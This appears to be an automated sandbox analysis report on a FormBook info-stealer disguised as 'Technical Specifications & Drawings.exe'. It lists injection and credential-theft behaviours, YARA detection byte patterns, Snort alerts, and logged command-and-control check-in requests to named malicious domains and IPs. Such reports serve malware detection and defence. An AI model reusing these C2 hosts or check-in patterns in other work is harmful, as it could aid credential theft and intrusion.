Windows Analysis Report
Technical Specifications & Drawings.exe

Overview

General Information

Sample Name:Technical Specifications & Drawings.exe
Analysis ID:680337
MD5:9b94f751e8cc145058db9f428c2ad571
SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
Tags:exe, Formbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Technical Specifications & Drawings.exe (PID: 6080 cmdline: "C:\Users\user\Desktop\Technical Specifications & Drawings.exe" MD5: 9B94F751E8CC145058DB9F428C2AD571)
    • Technical Specifications & Drawings.exe (PID: 5084 cmdline: C:\Users\user\Desktop\Technical Specifications & Drawings.exe MD5: 9B94F751E8CC145058DB9F428C2AD571)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1896 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup
{"C2 list": ["www.tomoptique.fr/02pi/"]}
Source | Rule | Description | Author | Strings
00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x65b1:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1dbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa53f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x16be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa10a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x158ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xae52:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c837:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d94a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x19289:$sqlite3step: 68 34 1C 7B E1
    • 0x193bc:$sqlite3step: 68 34 1C 7B E1
    • 0x192cb:$sqlite3text: 68 38 2A 90 C5
    • 0x19413:$sqlite3text: 68 38 2A 90 C5
    • 0x192e2:$sqlite3blob: 68 53 D8 7F 8C
    • 0x19435:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      Source | Rule | Description | Author | Strings
      4.0.Technical Specifications & Drawings.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x57b1:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cde0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x973f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x15fe7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x15de5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15891:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15ee7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1605f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x930a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x14aac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa052:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ba37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1cb4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.Technical Specifications & Drawings.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18489:$sqlite3step: 68 34 1C 7B E1
        • 0x185bc:$sqlite3step: 68 34 1C 7B E1
        • 0x184cb:$sqlite3text: 68 38 2A 90 C5
        • 0x18613:$sqlite3text: 68 38 2A 90 C5
        • 0x184e2:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18635:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          No Sigma rule has matched
          Timestamp:08/08/22-12:28:44.161490
          Source IP:192.168.2.3
          Destination IP:67.23.226.119
          SID:2031412
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:08/08/22-12:28:44.161490
          Source IP:192.168.2.3
          Destination IP:67.23.226.119
          SID:2031453
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:08/08/22-12:28:49.631208
          Source IP:192.168.2.3
          Destination IP:67.223.117.72
          SID:2031449
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:08/08/22-12:28:49.631208
          Source IP:192.168.2.3
          Destination IP:67.223.117.72
          SID:2031412
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:08/08/22-12:28:49.631208
          Source IP:192.168.2.3
          Destination IP:67.223.117.72
          SID:2031453
          Source Port:49809
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:08/08/22-12:28:44.161490
          Source IP:192.168.2.3
          Destination IP:67.23.226.119
          SID:2031449
          Source Port:49803
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected


          AV Detection

          Source: Technical Specifications & Drawings.exe, Virustotal: Detection: 32%
          Source: Technical Specifications & Drawings.exe, ReversingLabs: Detection: 21%
          Source: Yara match, File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_, Avira URL Cloud: Label: malware
          Source: http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_, Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_, Avira URL Cloud: Label: malware
          Source: http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_, Avira URL Cloud: Label: malware
          Source: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91, Avira URL Cloud: Label: malware
          Source: http://www.mexc-event-partner.site/02pi/, Avira URL Cloud: Label: malware
          Source: www.tomoptique.fr/02pi/, Avira URL Cloud: Label: malware
          Source: boshi-eg.online, Virustotal: Detection: 12%
          Source: mexc-event-partner.site, Virustotal: Detection: 5%
          Source: Technical Specifications & Drawings.exe, Joe Sandbox ML: detected
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.tomoptique.fr/02pi/"]}
          Source: Technical Specifications & Drawings.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Technical Specifications & Drawings.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

          Networking

          Source: C:\Windows\explorer.exe, Network Connect: 109.234.162.62 80
          Source: C:\Windows\explorer.exe, Domain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exe, Domain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exe, Network Connect: 107.155.208.43 80
          Source: C:\Windows\explorer.exe, Network Connect: 184.168.107.80 80
          Source: C:\Windows\explorer.exe, Network Connect: 67.23.226.119 80
          Source: C:\Windows\explorer.exe, Domain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exe, Network Connect: 67.223.117.72 80
          Source: C:\Windows\explorer.exe, Domain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exe, Domain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exe, Domain query: www.esandcraic.com
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
          Source: Malware configuration extractor, URLs: www.tomoptique.fr/02pi/
          Source: Joe Sandbox View, ASN Name: O2SWITCHFR O2SWITCHFR
          Source: Joe Sandbox View, ASN Name: BEKKOAMEBEKKOAMEINTERNETINCJP BEKKOAMEBEKKOAMEINTERNETINCJP
          Source: global traffic, HTTP traffic detected:
            GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1
            Host: www.kirchhoff-darryl.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected:
            GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1
            Host: www.tomoptique.fr
            Connection: close
            Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected:
            GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1
            Host: www.boshi-eg.online
            Connection: close
            Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected:
            GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1
            Host: www.esandcraic.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected:
            GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1
            Host: www.mexc-event-partner.site
            Connection: close
            Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 67.223.117.72 67.223.117.72
          Source: Joe Sandbox View, IP Address: 67.23.226.119 67.23.226.119
          Source: global traffic, HTTP traffic detected:
            POST /02pi/ HTTP/1.1
            Host: www.mexc-event-partner.site
            Connection: close
            Content-Length: 409
            Cache-Control: no-cache
            Origin: http://www.mexc-event-partner.site
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.mexc-event-partner.site/02pi/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Mon, 08 Aug 2022 10:28:44 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Mon, 08 Aug 2022 10:28:49 GMT
            Server: Apache
            Content-Length: 5278
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Mon, 08 Aug 2022 10:29:02 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Mon, 08 Aug 2022 10:29:02 GMT
            Server: Apache
            Content-Length: 315
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://fontfabrik.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.carterandcone.coml
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.fonts.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.goodfont.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmp, String found in binary or memory: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 00000013.00000002.517362036.000000000473B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: unknownHTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: unknownDNS traffic detected: queries for: www.kirchhoff-darryl.com
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          Source: Yara matchFile source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
